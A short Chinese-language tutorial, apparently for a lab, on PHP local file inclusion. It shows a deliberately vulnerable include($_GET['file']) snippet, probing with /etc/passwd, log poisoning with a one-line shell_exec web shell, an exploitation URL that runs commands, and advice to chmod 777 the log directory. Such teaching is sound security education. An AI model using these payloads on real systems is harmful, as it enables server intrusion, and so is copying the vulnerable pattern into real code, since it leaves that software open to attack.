PHP Local File Include漏洞
P LFI (Local file include) 利用php 的include函数 ,包含本地的恶意代码文件.
0.环境搭建
使用Apache2 +php7
1. 什么时候会出现LFI漏洞
比如当正常访问的URL中包含 类似 ?file=xxx.php的时候, 尝试修改file的值为/etc/passwd 或 者c:\windows\system32\drivers\etc\hosts 等,如果返回了对应的文件, 则这个网站就有LFI漏洞
文件包含的源码类似结构如下
<?php
file=$_GET["file"];
include $file;
?>
服务端根据PHP请求的参数file, 调用include函数来包含指定的文件, 如果文件中有PHP的代码,则会直接执行。
2. 如何让服务器本地有恶意代码文件
常用的方式是使用日志
当我们尝试访问服务器的时候, 会留下日志, 如下
利用这一性质, 我们可以构造带有恶意代码的URL 进行访问
http://ip:80/<?php echo shell_exec($_GET['cmd']) ?>
此时日志中就包含了恶意代码,这行代码的意思是将请求传入的cmd参数作为命令执行, 然后使用echo打印结果
3. 漏洞利用
使用file 执行日志文件, 并传入cmd参数
http:// ip /LFI.php?file=/var/log/httpd/access_log&cmd=ls -l
服务器端会解析出日志中包含的php代码, 该代码获取了cmd参数的值并执行
注:
- apache2的日志目录 /var/log/httpd目录 好像默认是只有root有rwx权限 , 为方便实验 可以使用chmod -R 777 /var/log/httpd 。